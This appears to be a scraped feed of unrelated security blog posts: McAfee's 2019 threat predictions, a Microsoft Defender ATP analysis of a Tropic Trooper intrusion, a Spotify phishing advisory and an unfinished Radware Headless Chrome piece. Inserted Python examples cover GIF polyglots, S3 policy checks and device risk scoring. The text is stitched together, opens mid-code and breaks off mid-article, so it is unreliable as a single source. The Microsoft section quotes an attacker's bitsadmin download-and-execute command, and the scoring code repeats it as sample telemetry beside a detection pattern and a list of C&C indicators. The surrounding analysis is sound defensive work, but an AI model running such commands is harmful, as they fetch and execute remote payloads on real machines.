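# Same image with a short, legitimate comment extension before the image block.
COMMENT_GIF = _HEAD + b"\x21\xfe\x05hello\x00" + _IMAGE + b"\x3b"
# Constructed polyglot: the clean image followed by inert marker text.
PAYLOAD = b"\r\n# constructed placeholder for the second-format content\r\n"
POLYGLOT_GIF = CLEAN_GIF + PAYLOAD

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_GIF), ("comment", COMMENT_GIF), ("polyglot", POLYGLOT_GIF)):
        report = analyze_gif(blob)
        print(f"{name}: image ends at {report['image_end']}, "
              f"{len(report['trailing'])} trailing bytes, suspicious={is_suspicious(report)}")
```

Every byte of the clean image is accounted for by the parser, so `image_end` equals the file length and nothing is flagged; the polyglot parses identically up to the trailer and then reports exactly the appended payload. A mail gateway or sandbox can apply the same logic to any attachment that claims to be an image.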

The attack raises many questions: What are you dealing with? Is it phishing 2.0? Is it stegware? Is it fileless and “living off the land”? Cryptojacking? Ransomware? It is everything at the same time.

This sophisticated but feasible example demonstrates that focusing on one threat may not be enough to detect or remediate an attack. When you aim to classify the attack into a single category, you might lose the big picture and thus be less effective mitigating it. Even if you stop the attack in the middle of the chain, discovering the initial and final stages is as important for protecting against future attempts.

Be curious, be creative, connect your defenses

Tackling sophisticated attacks based on synergistic threats requires questioning every threat. What if this ransomware hit was part of something bigger? What if this phishing email pivots to a technique that employees are not trained for? What if we are missing the real goal of the attack?

Bearing these questions in mind will not only help capture the big picture, but also get the most of security solutions. We predict bad actors will add synergy to their attacks, but cyber defenses can also work synergistically.

Cybercriminals to Use Social Media Misinformation, Extortion Campaigns to Challenge Organizations’ Brands

The elections were influenced, fake news prevails, and our social media followers are all foreign government–controlled bots. At least that's how the world feels sometimes. To say recent years have been troubled for social media companies would be an understatement. During this period a game of cat and mouse has ensued, as automated accounts are taken down, adversaries' tactics evolve, and botnet accounts emerge looking more legitimate than ever before. In 2019, we predict an increase of misinformation and extortion campaigns via social media that will focus on brands and originate not from nation-state actors but from criminal groups.

Nation-states leverage bot battalions to deliver messages or manipulate opinion, and their effectiveness is striking. Bots often will take both sides of a story to spur debate, and this tactic works. By employing a system of amplifying nodes, as well as testing the messaging (including hashtags) to determine success rates, botnet operators demonstrate a real understanding of how to mold popular opinion on critical issues.

In one example, an account that was only two weeks old with 279 followers, most of which were other bots, began a harassment campaign against an organization. By amplification, the account generated an additional 1,500 followers in only four weeks by simply tweeting malicious content about their target.

Activities to manipulate public opinion have been well documented and bots well versed in manipulating conversations to drive agendas stand ready. Next year we expect that cybercriminals will repurpose these campaigns to extort companies by threatening to damage their brands. Organizations face a serious danger.

Data Exfiltration Attacks to Target the Cloud

In the past two years, enterprises have widely adopted the Software-as-a-Service model, such as Office 365, as well as Infrastructure- and Platform-as-a-Service cloud models, such as AWS and Azure. With this move, far more corporate data now resides in the cloud. In 2019, we expect a significant increase in attacks that follow the data to the cloud.

With the increased adoption of Office 365, we have noticed a surge of attacks on the service, especially attempts to compromise email. One threat the McAfee cloud team uncovered was the botnet KnockKnock, which targeted system accounts that typically do not have multifactor authentication. We have also seen the emergence of attacks that abuse the trust model of OAuth (Open Authorization), in which a user is tricked into granting a malicious application access to their account. One was launched by Fancy Bear, the Russian cyber espionage group, phishing users with a fake Google security app to gain access to user data.

Similarly, during the last couple of years we have seen many high-profile data breaches attributed to misconfigured Amazon S3 buckets. This is clearly not the fault of AWS. Based on the shared responsibility model, the customer is on the hook to properly configure IaaS/PaaS infrastructure and properly protect their enterprise data and user access. Complicating matters, many of these misconfigured buckets are owned by vendors in their supply chains, rather than by the target enterprises. With access to thousands of open buckets and credentials, bad actors are increasingly opting for these easy pickings.

McAfee has found that 21% of data in the cloud is sensitive—such as intellectual property, and customer and personal data—according to the McAfee Cloud Adoption and Risk Report. With a 33% increase in users collaborating on this data during the past year, cybercriminals know how to seek more targets:

  • Cloud-native attacks targeting weak APIs or ungoverned API endpoints to gain access to the data in SaaS as well as in PaaS and serverless workloads
  • Expanded reconnaissance and exfiltration of data in cloud databases (PaaS or custom applications deployed in IaaS) expanding the S3 exfiltration vector to structured data in databases or data lakes
  • Leveraging the cloud as a springboard for cloud-native man-in-the-middle attacks (such as GhostWriter, which exploits S3 buckets left publicly writable by customer misconfiguration) to launch cryptojacking or ransomware attacks, along with other variants of MITM attacks.
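The S3 exposures described in this section share one root cause on the customer side of the shared responsibility model: a bucket policy or ACL that lets an anonymous or any-authenticated principal read or, in the GhostWriter case, write objects. The following is an added example, not McAfee's or AWS's code, that evaluates a bucket policy document and an ACL grant list for that condition offline. The weak and corrected configurations, the bucket name and the account ID are constructed; the condition keys treated as "scoping" are an assumption about which conditions pin a wildcard principal back to resources the account controls.

```python
"""Static check for public read/write exposure in S3 bucket policies and ACLs.

Added example, not McAfee's or AWS's code. The policy documents and ACL
grants below are constructed; nothing here calls AWS. The check is
deliberately conservative: it flags wildcard principals unless a statement
condition pins the request to the account's own VPC, organization or ARN.
"""
import fnmatch

ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTH_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
PUBLIC_GROUPS = {ALL_USERS, AUTH_USERS}

READ_ACTIONS = {"s3:GetObject", "s3:ListBucket"}
WRITE_ACTIONS = {"s3:PutObject", "s3:DeleteObject", "s3:PutObjectAcl",
                 "s3:PutBucketPolicy", "s3:PutBucketAcl"}
ACL_WRITE_PERMISSIONS = {"WRITE", "WRITE_ACP", "FULL_CONTROL"}
# Assumed set of condition keys that scope a "*" principal to account-controlled sources.
SCOPING_CONDITION_KEYS = {"aws:SourceVpc", "aws:SourceVpce", "aws:PrincipalOrgID",
                          "aws:PrincipalArn", "aws:SourceArn", "aws:SourceAccount"}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _is_public_principal(principal):
    """True for Principal "*" or {"AWS": "*"}, the two spellings of "everyone"."""
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS", []))


def _has_scoping_condition(statement):
    keys = {k for operand in statement.get("Condition", {}).values() for k in operand}
    return bool(keys & SCOPING_CONDITION_KEYS)


def policy_findings(policy):
    """Return (Sid, action, level) for every sensitive action the policy grants to everyone."""
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or not _is_public_principal(stmt.get("Principal")):
            continue  # a Deny with Principal "*" is a guardrail, not a finding
        if _has_scoping_condition(stmt):
            continue
        patterns = [p.lower() for p in _as_list(stmt.get("Action", []))]
        for action in sorted(READ_ACTIONS | WRITE_ACTIONS):
            if any(fnmatch.fnmatchcase(action.lower(), p) for p in patterns):
                level = "public-write" if action in WRITE_ACTIONS else "public-read"
                findings.append((stmt.get("Sid", "<no Sid>"), action, level))
    return findings


def acl_findings(grants):
    """Return (group, permission, level) for every grant to AllUsers or AuthenticatedUsers."""
    findings = []
    for grant in grants:
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS:
            perm = grant["Permission"]
            level = "public-write" if perm in ACL_WRITE_PERMISSIONS else "public-read"
            findings.append((grantee["URI"].rsplit("/", 1)[-1], perm, level))
    return findings


def bucket_is_public(policy, grants):
    return bool(policy_findings(policy) or acl_findings(grants))


BUCKET_ARN = "arn:aws:s3:::example-vendor-uploads"  # constructed bucket name

# Constructed weak configuration: anyone on the internet can read and write objects,
# and the ACL additionally grants WRITE to the AllUsers group.
WEAK_POLICY = {"Version": "2012-10-17", "Statement": [{
    "Sid": "PublicDrop", "Effect": "Allow", "Principal": "*",
    "Action": ["s3:GetObject", "s3:PutObject"], "Resource": BUCKET_ARN + "/*"}]}
WEAK_ACL = [
    {"Grantee": {"Type": "CanonicalUser", "ID": "owner-id"}, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "WRITE"},
]

# Constructed corrected configuration: only a named vendor role may write, and the
# "*" principal appears only in a Deny that blocks non-TLS requests.
FIXED_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Sid": "VendorRoleOnly", "Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::111122223333:role/VendorUploader"},
     "Action": "s3:PutObject", "Resource": BUCKET_ARN + "/*"},
    {"Sid": "DenyInsecureTransport", "Effect": "Deny", "Principal": "*",
     "Action": "s3:*", "Resource": [BUCKET_ARN, BUCKET_ARN + "/*"],
     "Condition": {"Bool": {"aws:SecureTransport": "false"}}},
]}
FIXED_ACL = [{"Grantee": {"Type": "CanonicalUser", "ID": "owner-id"}, "Permission": "FULL_CONTROL"}]

if __name__ == "__main__":
    print("weak:", policy_findings(WEAK_POLICY), acl_findings(WEAK_ACL))
    print("fixed:", policy_findings(FIXED_POLICY), acl_findings(FIXED_ACL))
```

The same function can be pointed at the output of `get-bucket-policy` and `get-bucket-acl` for every bucket in an account, including buckets owned by suppliers who can be asked to run it; the supply-chain angle in the text is exactly that the check has to be run on buckets the enterprise does not own. Note that wildcard actions such as `s3:*` are matched with `fnmatch`, so a policy granting `s3:*` to `*` is reported for every read and write action.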

Voice-Controlled Digital Assistants the Next Vector in Attacking IoT Devices

As tech fans continue to fill their homes with smart gadgets, from plugs to TVs, coffee makers to refrigerators, and motion sensors to lighting, the means of gaining entry to a home network are growing rapidly, especially given how poorly secured many IoT devices remain.

But the real key to the network door next year will be the voice-controlled digital assistant, a device created in part to manage all the IoT devices within a home. As sales increase—and an explosion in adoption over the holiday season looks likely—the attraction for cybercriminals to use assistants to jump to the really interesting devices on a network will only continue to grow.

For now, the voice assistant market is still taking shape, with many brands still looking to dominate the market, in more ways than one, and it is unclear whether one device will become ubiquitous. If one does take the lead, its security features will quite rightly fall under the microscope of the media, though not perhaps before its privacy concerns have been fully examined in prose.

(Last year we highlighted privacy as the key concern for home IoT devices. Privacy will continue to be a concern, but cybercriminals will put more effort into building botnets, demanding ransoms, and threatening the destruction of property of both homes and businesses).

This opportunity to control a home’s or office’s devices will not go unnoticed by cybercriminals, who will engage in an altogether different type of writing in relation to the market winner, in the form of malicious code designed to attack not only IoT devices but also the digital assistants that are given so much license to talk to them.

Smartphones have already served as the door to a threat. In 2019, they may well become the picklock that opens a much larger door. We have already seen two threats that demonstrate what cybercriminals can do with unprotected devices, in the form of the Mirai botnet, which first struck in 2016, and IoT Reaper, in 2017. These IoT malware families appeared in many variants to attack connected devices such as routers, network video recorders, and IP cameras. They expanded their reach by password cracking and exploiting known vulnerabilities to build worldwide robot networks.

Next year we expect to see two main vectors for attacking home IoT devices: routers and smartphones/tablets. The Mirai botnet demonstrated the lack of security in routers. Infected smartphones, which can already monitor and control home devices, will become one of the top targets of cybercriminals, who will employ current and new techniques to take control.

Malware authors will take advantage of phones and tablets, those already trusted controllers, to try to take over IoT devices by password cracking and exploiting vulnerabilities. These attacks will not appear suspicious because the network traffic comes from a trusted device. The success rate of attacks will increase, and the attack routes will be difficult to identify. An infected smartphone could be the source of the next incident in which a router's DNS settings are hijacked. Vulnerabilities in mobile and cloud apps are also ripe for exploitation, with smartphones at the core of the criminals’ strategy.

Infected IoT devices will supply botnets, which can launch DDoS attacks, as well as steal personal data. The more sophisticated IoT malware will exploit voice-controlled digital assistants to hide its suspicious activities from users and home-network security software. Malicious activities such as opening doors and connecting to control servers could be triggered by user voice commands (“Play music” and “What is today’s weather?”). Soon we may hear infected IoT devices themselves exclaiming: “Assistant! Open the back door!”

Cybercriminals to Increase Attacks on Identity Platforms and Edge Devices Under Siege

Large-scale data breaches of identity platforms—which offer centralized secure authentication and authorization of users, devices, and services across IT environments—have been well documented in 2018. Meanwhile, the captured data is being reused to cause further misery for its victims. In 2019, we expect to see large-scale social media platforms implement additional measures to protect customer information. However, as the platforms grow in numbers, we predict criminals will further focus their resources on such attractive, data-rich environments. The struggle between criminals and big-scale platforms will be the next big battleground.

Triton, malware that attacks industrial control systems (ICS), has demonstrated the capabilities of adversaries to remotely target manufacturing environments through their adjacent IT environments. Identity platform and “edge device” breaches will provide the keys to adversaries to launch future remote ICS attacks due to static password use across environments and constrained edge devices, which lack secure system requirements due to design limitations. (An edge device is any network-enabled system hardware or protocol within an IoT product.) We expect multifactor authentication and identity intelligence will become the best methods to provide security in this escalating battle. We also predict identity intelligence will complement multifactor authentication to strengthen the capabilities of identity platforms.

Identity is a fundamental component in securing IoT. In these ecosystems, devices and services must securely identify trusted devices so that they can ignore the rest. The identity model has shifted from user centric in traditional IT systems to machine centric for IoT systems. Unfortunately, due to the integration of operational technology and insecure “edge device” design, the IoT trust model is built on a weak foundation of assumed trust and perimeter-based security.

At Black Hat USA and DEF CON 2018, 30 talks discussed IoT edge device exploitation. That’s a large increase from just 19 talks on the topic in 2017. The increase in interest was primarily in relation to ICS, consumer, medical, and “smart city” verticals. (See Figure 1.) Smart edge devices, combined with high-speed connectivity, are enabling IoT ecosystems, but the rate at which they are advancing is compromising the security of these systems.

Figure 1: The number of conference sessions on the security of IoT devices has increased, matching the growing threat to poorly protected devices. 

Most IoT edge devices provide no self-defense (isolating critical functions, memory protection, firmware protection, least privileges, or security by default) so one successful exploit owns the device. IoT edge devices also suffer from “break once, run everywhere” attacks—due to insecure components used across many device types and verticals. (See articles on WingOS and reverse engineering.)

McAfee Advanced Threat Research team engineers have demonstrated how medical device protocols can be exploited to endanger human life and compromise patients’ privacy due to assumed trust. These examples illustrate just a few of many possible scenarios that lead us to believe adversaries will choose IoT edge devices as the path of least resistance to achieve their objectives. Servers have been hardened over the last decade, but IoT hardware is far behind. By understanding an adversary’s motives and opportunities (attack surface and access capability), we can define a set of security requirements independent of a specific attack vector.

Figure 2 gives a breakdown of the types of vulnerabilities in IoT edge devices, highlighting weak points to address by building identity and integrity capabilities into edge hardware to ensure these devices can deflect attacks.

Figure 2: Insecure protocols are the primary attack surface in IoT edge devices.

IoT security must begin on the edge with a zero-trust model and provide a hardware root of trust as the core building block for protecting against hack and shack attacks and other threats. McAfee predicts an increase in compromises on identity platforms and IoT edge devices in 2019 due to the adoption of smart cities and increased ICS activity.

The post McAfee Labs 2019 Threats Predictions Report appeared first on McAfee Blogs.

Is security the real stuff of nightmares?

The Chief Information Security Officer (CISO) role is the most senior cyber security role in any organisation, and the role has developed rapidly in recent years under the wave of increased digital needs. With more customer data gathered and stored than ever before, the risk of implementing a sub-par security strategy affects every level of the organisation. CISOs are the custodians, responsible for protecting the face of their business and the trust of its customers as … More

The post Is security the real stuff of nightmares? appeared first on Help Net Security.

Keeping data swamps clean for ongoing GDPR compliance

The increased affordability and accessibility of data storage over recent years can be both a benefit and a challenge for businesses. While the ability to stockpile huge volumes and varieties of data can deliver previously unattainable intelligence and insight, it can also result in ‘data sprawl’, with businesses unclear of exactly what information is being stored, where it’s being held, and how it’s being accessed. The introduction of the General Data Protection Regulation (GDPR) in … More

The post Keeping data swamps clean for ongoing GDPR compliance appeared first on Help Net Security.

7 trends driving enterprise IT transformation in 2019

Enabling the business outcome in a ‘Real-Time’ enterprise environment is the next challenge for global brands and government agencies in 2019. Tech companies will need to drive hard to continually exceed their customers’ expectations during a time of accelerating change. They will need to show how technology can help deliver on their customers’ objectives, improve agility, security and impact, or they risk being disrupted. Here is Verizon Enterprise Solutions’ view of those enterprise technology … More

The post 7 trends driving enterprise IT transformation in 2019 appeared first on Help Net Security.

Windows Defender ATP device risk score exposes new cyberattack, drives Conditional access to protect networks

Several weeks ago, the Windows Defender Advanced Threat Protection (Windows Defender ATP) team uncovered a new cyberattack that targeted several high-profile organizations in the energy and food and beverage sectors in Asia. Given the target region and verticals, the attack chain, and the toolsets used, we believe the threat actor that the industry refers to as Tropic Trooper was likely behind the new attack.

The attack set off numerous Windows Defender ATP alerts and triggered the device risk calculation mechanism, which labeled the affected machines with the highest risk. The high device risk score put the affected machines at the top of the list in Windows Defender Security Center, which led to the early detection and discovery of the attack.

With the high risk determined for affected machines, Conditional access blocked these machines' access to sensitive content, protecting other users, devices, and data in the network. IT admins can control access with Conditional access based on the device risk score to ensure that only secure devices have access to enterprise resources.

Finally, automatic investigation and remediation kicked in, discovered the artifacts on affected machines that were related to the breach, and remediated the threat. This sequence of actions ensured that the attackers no longer had a foothold on the affected machines, returning them to a normal working state. Once the threat was remediated, the risk score for those machines was reduced and Conditional access restrictions were lifted.

Investigating alert timelines and process trees

We discovered the attack when Windows Defender ATP called our attention to alerts flagging several different suspicious activities like abnormal Office application activity, dubious cross-process injections, and machine-learning-based indications of anomalous execution flows. The sheer volume and variety of the alerts told us something serious was going on.

Figure 1. Multiple alerts triggered by the attack

The first detection related to the attack was fired by a suspicious EQNEDT32.exe behavior, which led us to the entry vector of the attack: a malicious document that carried an exploit for CVE-2018-0802, a vulnerability in Microsoft Office Equation Editor, which the actor known as Tropic Trooper has exploited in previous campaigns.

Through the tight integration between Windows Defender ATP and Office 365 ATP, we were able to use Office 365 ATP Threat Explorer to find the specific emails that the attackers used to distribute the malicious document.

Using Windows Defender Security Center, we further investigated the detected executable and found that the attackers used bitsadmin.exe to download and execute a randomly named payload from a remote server:

bitsadmin /transfer Cd /priority foreground http:/<IP address>:4560/.exe %USERPROFILE%\fY.exe && start %USERPROFILE%\fY.exe

Machine timeline activity showed that the executed payload communicated to a remote command-and-control (C&C) server and used process hollowing to run code in a system process memory.

In some cases, the attacker ran additional activities using malicious PowerShell scripts. Windows Defender ATP's Antimalware Scan Interface (AMSI) sensor exposed all the attacker scripts, which we observed were meant mostly for data exfiltration.

Figure 2. Process tree

Using the timeline and process tree views in Windows Defender Security Center, we were able to identify the processes exhibiting malicious activities and pinpoint exactly when they occurred, allowing us to reconstruct the attack chain. As a result of this analysis, we were able to determine a strong similarity between this new attack and the attack patterns used by the threat actor known as Tropic Trooper.

Figure 3. Campaign attack chain

Device risk calculation and incident prioritization

The alerts that were raised for this attack resulted in a high device risk score for affected machines. Windows Defender ATP determines a device risk score based on different mechanisms. The score is meant to raise the risk level of machines with true positive alerts that indicate a potential targeted attack. The high device risk score pushed the affected machines to the top of the queue, helping ensure that security operations teams immediately notice and prioritize them. More importantly, elevated device risk scores trigger automatic investigation and response, helping contain attacks early in their lifespan.

In this specific attack, the risk calculation mechanism gave the affected machines the highest risk based on cumulative risk. Cumulative risk is calculated from the multiple components and multiple types of anomalous behavior exhibited by an attack across the infection chain.

Windows Defender ATP-driven conditional access

When Windows Defender ATP raises the device risk score for machines, as in this attack, the affected devices are marked as being at high risk. This risk score is immediately communicated to Conditional access, resulting in the restriction of access from these devices to corporate services and data managed by Azure Active Directory.

This integration between Windows Defender ATP and Azure Active Directory through Microsoft Intune ensures that attackers are immediately prevented from gaining access to sensitive corporate data, even if attackers manage to establish a foothold on networks. When the threat is remediated, Windows Defender ATP drops the device risk score, and the device regains access to resources. Read more about Conditional access here.
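The cumulative risk calculation and the Conditional access decision described in the two sections above can be illustrated with a small simulation. This is an added example, not Windows Defender ATP's or Microsoft's code: the alert categories, severity weights, thresholds and the bitsadmin detection rule are hypothetical, and the telemetry is constructed (192.0.2.10 is a documentation address standing in for the attacker's server).

```python
"""Added example (not Microsoft's code): cumulative device risk scoring and a
conditional-access decision in the spirit of the mechanism described above.
Alert categories, weights and thresholds are hypothetical."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Hypothetical severity weights and risk thresholds (not Windows Defender ATP's real values).
SEVERITY_WEIGHT = {"low": 1, "medium": 3, "high": 6}
HIGH_RISK_THRESHOLD = 30
MEDIUM_RISK_THRESHOLD = 10


@dataclass(frozen=True)
class Alert:
    device: str
    category: str   # kind of anomalous behaviour observed
    severity: str   # "low", "medium" or "high"


# Hypothetical detection for the download-and-execute pattern quoted above:
# bitsadmin /transfer fetching a file over HTTP and then starting it in the same command line.
BITSADMIN_DOWNLOAD_EXEC = re.compile(
    r"bitsadmin(?:\.exe)?\s+/transfer\b.*https?:/+\S+.*(?:&&|;)\s*start\s",
    re.IGNORECASE,
)


def alerts_from_process_events(events):
    """Turn (device, parent_image, command_line) process-creation events into alerts."""
    alerts = []
    for device, parent, cmdline in events:
        if BITSADMIN_DOWNLOAD_EXEC.search(cmdline):
            alerts.append(Alert(device, "bitsadmin_download_exec", "high"))
        if parent.lower() == "eqnedt32.exe":
            # Equation Editor has no business spawning command interpreters or downloaders.
            alerts.append(Alert(device, "equation_editor_child_process", "high"))
    return alerts


def device_risk_scores(alerts):
    """Cumulative risk: severity-weighted sum multiplied by the number of distinct
    behaviour categories, so a chain of different anomalies outranks one noisy alert."""
    per_device = defaultdict(list)
    for alert in alerts:
        per_device[alert.device].append(alert)
    scores = {}
    for device, device_alerts in per_device.items():
        weighted = sum(SEVERITY_WEIGHT[a.severity] for a in device_alerts)
        distinct = len({a.category for a in device_alerts})
        scores[device] = weighted * distinct
    return scores


def risk_level(score):
    if score >= HIGH_RISK_THRESHOLD:
        return "high"
    if score >= MEDIUM_RISK_THRESHOLD:
        return "medium"
    return "low" if score > 0 else "none"


def conditional_access_decision(level):
    """Only high-risk devices lose access to managed resources; lower levels are queued for review."""
    return "block" if level == "high" else "allow"


def assess(process_events, sensor_alerts):
    """Combine rule-based alerts with alerts from other sensors and return, per device,
    the cumulative score, its level and the access decision, highest risk first."""
    alerts = alerts_from_process_events(process_events) + list(sensor_alerts)
    results = {}
    for device, score in device_risk_scores(alerts).items():
        level = risk_level(score)
        results[device] = {"score": score, "level": level,
                           "decision": conditional_access_decision(level)}
    return dict(sorted(results.items(), key=lambda kv: -kv[1]["score"]))


# Constructed sample telemetry (192.0.2.10 is a documentation address, not a real C&C).
PROCESS_EVENTS = [
    ("WS-01", "EQNEDT32.exe",
     r"cmd.exe /c bitsadmin /transfer Cd /priority foreground "
     r"http://192.0.2.10:4560/x.exe %USERPROFILE%\fY.exe && start %USERPROFILE%\fY.exe"),
    ("WS-02", "explorer.exe", r"C:\Program Files\Tool\tool.exe --update"),
]
SENSOR_ALERTS = [
    Alert("WS-01", "process_hollowing", "high"),          # cross-process injection
    Alert("WS-01", "amsi_suspicious_script", "medium"),   # PowerShell content seen by AMSI
    Alert("WS-02", "rare_process_execution", "low"),
]

if __name__ == "__main__":
    for device, result in assess(PROCESS_EVENTS, SENSOR_ALERTS).items():
        print(device, result)
```

The multiplier on distinct categories is the part that matters: WS-01 does not reach "high" because of any single alert but because four different kinds of anomaly line up on one machine, which is the cumulative-risk idea the post describes, while WS-02 with one low-severity alert stays usable.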

Signal sharing and threat remediation across Microsoft Threat Protection

In this attack investigation, the integration of Windows Defender ATP and Office 365 ATP allowed us to trace the entry vector, and security operations teams can seamlessly pivot between the two services, enabling them to investigate the end-to-end timeline of an attack.

Threat signal sharing across services through the Intelligent Security Graph ensures that threat remediation is orchestrated across Microsoft Threat Protection. In this case, Office 365 ATP blocked the related email and malicious document used in the initial stages of the attack. Office 365 ATP had determined the malicious nature of the emails and attachment at the onset, stopping the attack's entry point and protecting Office 365 ATP customers from the attack.

This threat signal is shared with Windows Defender ATP, adding to the rich threat intelligence that was used for investigation. Likewise, Office 365 ATP consumes intelligence from Windows Defender ATP, helping make sure that malicious attachments are detected and related emails are blocked.

Meanwhile, as mentioned, the integration of Windows Defender ATP and Azure Active Directory ensured that affected devices are not allowed to access sensitive corporate data until the threat is resolved.

Windows Defender ATP, Office 365 ATP, and Azure Active Directory are just three of the many Microsoft services now integrated through Microsoft Threat Protection, an integrated solution for securing identities, endpoints, user data, cloud apps, and infrastructure.

Conclusion

The new device risk calculation mechanism in Windows Defender ATP raised the priority of various alerts that turned out to be related to a targeted attack, exposing the threat and allowing security operations teams to immediately take remediation actions. Additionally, the elevated device risk score triggered automated investigation and response, mitigating the attack at its early stages.

Through Conditional access, compromised machines are blocked from accessing critical corporate assets. This protects organizations from the serious risk of attackers leveraging compromised devices to perform cyberespionage and other types of attacks.

To test how these and other advanced capabilities in Windows Defender ATP can help your organization detect, investigate, and respond to attacks, sign up for a free trial.

Hadar Feldman and Yarden Albeck
Windows Defender ATP team

Indicators of attack (IoCs)

Command and control IP addresses and URLs:

  • 199[.]192[.]23[.]231
  • 45[.]122[.]138[.]6
  • lovehaytyuio09[.]om

Files (SHA-256):

  • 9adfc863501b4c502fdac0d97e654541c7355316f1d1663b26a9aaa5b5e722d6 (size: 190696 bytes, type: PE)
  • 5589544be7f826df87f69a84abf478474b6eef79b48b914545136290fee840fe (size: 727552, type: PE)
  • 073884caf7df8dafc225567f9065bbf9bf8e5beef923655d45fe5b63c6b6018c (size: 195123 bytes, type: docx)
  • 1aef46dcbf9f0b5ff548f492685d488c7ac514a24e63a4d3ed119bfdbd39c908 (size: 207444, type: docx)

Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

The post Windows Defender ATP device risk score exposes new cyberattack, drives Conditional access to protect networks appeared first on Microsoft Secure.

The Spotify Phishing Scam: How to Reel in This Cyberthreat

Many music-lovers around the world use Spotify to stream all of their favorite tunes. While the music streaming platform is a convenient tool for users to download and listen to their music, hackers are capitalizing on the company’s popularity with a recent phishing campaign. The campaign lures users into giving up their account details, putting innocent Spotify customers’ credentials at risk.

So, how are the account hijackers conducting these phishing attacks? The campaign sends listeners fraudulent emails that appear to be from Spotify, prompting them to confirm their account details. However, the link contained in the email is actually a phishing link. When the user clicks on it, they are redirected to a phony Spotify website where they are prompted to enter their username and password for the hacker’s disposal.

This phishing campaign can lead to a variety of other security risks for victims exposed to the threat. For example, many users include their birthday or other personal information in their password to make it easier to remember. If a hacker gains access to a user’s Spotify password, they are given a glance into the victim’s password creation mindset, which could help them breach other accounts belonging to the user.

Fortunately, there are multiple steps users can take to avoid the Spotify phishing campaign and threats like it. Check out the following tips:

  • Create complex passwords. If a hacker gains access to a victim’s username and password, they will probably analyze these credentials to determine how the victim creates their passwords. It’s best to create passwords that don’t include personal information, such as your birthday or the name of your pet.
  • Avoid reusing passwords. If victims reuse the same password for multiple accounts, this attack could allow cybercriminals to breach additional services and platforms. To prevent hackers from accessing other accounts, create unique usernames and passwords for each online platform you use.
  • Look out for phishing red flags. If you notice that the “from” address in an email is a little sketchy or an unknown source, don’t interact with the message. And if you’re still unsure of whether the email is legitimate or not, hover your mouse over the button prompting you to click on the link (but don’t actually click on it). If the URL preview doesn’t seem to be related to the company, it is most likely a phishing email.
  • Be skeptical of emails claiming to come from legitimate companies. If you receive an email asking to confirm your login credentials, go directly to the company’s website. You should be able to check the status of your account on the company website or under the settings portion of the Spotify app to determine the legitimacy of the request.
  • Use security software to surf the web safely. Make sure you use a website reputation tool like McAfee WebAdvisor to avoid landing on phishing and malicious sites.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The Spotify Phishing Scam: How to Reel in This Cyberthreat appeared first on McAfee Blogs.

Radware Blog: Evolving Cyberthreats: It’s Time to Enhance Your IT Security Mechanisms

For years, cybersecurity professionals across the globe have been highly alarmed by threats appearing in the form of malware, including Trojans, viruses, worms, and spear phishing attacks. And this year was no different. 2018 witnessed its fair share of attacks, including some new trends: credential theft emerged as a major concern, and although ransomware remains […]

The post Evolving Cyberthreats: It’s Time to Enhance Your IT Security Mechanisms appeared first on Radware Blog.


Headless Chrome: DevOps Love It, So Do Hackers, Here’s Why

Google Chrome is the most popular web browser and has been so for almost a decade. Each new version of Chrome brings new usability, security and performance features.

This article focuses on the “headless mode” feature that Google released more than a year ago, which since day one has been very popular not only among software engineers and testers but also with attackers.

Off with their heads!

Headless mode is a functionality that allows the execution of a full version of the latest Chrome browser while controlling it programmatically. It can be used on servers without dedicated graphics or display, meaning that it runs without its “head”, the Graphical User Interface (GUI).

In headless mode, it’s possible to run large scale web application tests, navigate from page to page without human intervention, confirm JavaScript functionality and generate reports.

As with benign cases, the same functionality takes place in malicious scenarios, when an attacker needs to evaluate JavaScript or emulate browser functionality.

The practice of web browser automation isn’t new. It’s used in dedicated headless browsers like PhantomJS and NightmareJS, test frameworks like Capybara and Jasmine, and tools like Selenium that can automate different browsers including Chrome.

How popular is Headless Chrome?

The chart below shows the amount of traffic generated by Headless Chrome and other major headless browsers since its release date in June 2017. In comparison to other headless browsers and automation frameworks, Headless Chrome overtook the previous leader, PhantomJS, within a year of its release.

Automated browser trends over the last year

The data collected from our cloud WAF statistics, reinforced by data from Google Trends, highlights how the popularity of PhantomJS fades, while Headless Chrome’s trajectory keeps climbing.

PhantomJS and Headless Chrome: Google search trends

Automated browsers driving increased traffic

Apart from Headless Chrome’s popularity, and the degradation in the popularity of outdated tools, we observed an increase in total traffic generated by automated browsers compared to non-automated web surfing.

The chart below represents the percentage of automated browsers out of total traffic generated by web browsers:

Traffic ratio between automated and non-automated browsers

So, why is Headless Chrome so popular?

There are several reasons for Headless Chrome’s popularity; one being the support for Chrome’s new “out of the box” features, which constantly introduce new trends in web development. Another reason is the support for major desktop, server, and mobile operating systems. Headless Chrome also has convenient development tools and many additional useful features for Devs.

The release of Puppeteer a couple of months after the release of the headless functionality was a decisive push in Headless Chrome’s popularity. Puppeteer is a NodeJs library developed by the Chrome team, which provides a high-level API to control headless and full versions of the latest Chrome.

Enter Puppeteer

Puppeteer is a common and natural way to control Chrome. It provides full access to browser features and, most importantly, can run Chrome in fully headless mode on a remote server, which is very useful for both automation teams and attackers.

Without much difficulty, attackers can put in place an infrastructure with a host of nodes running Headless Chrome and orchestrated by one component (Puppeteer).

Apart from Puppeteer, Chrome can be automated using webdriver and automation frameworks like Selenium or by direct access through the Command Line Interface (CLI). In this case, some Chrome functionality will be limited, but it offers the flexibility to write automation in any programming language besides NodeJS and JavaScript.

Just how popular is it among attackers?

By analyzing malicious activity generated by automated browsers, I found that PhantomJS was a leader not only in the amount of traffic it produced but also in malicious activity.

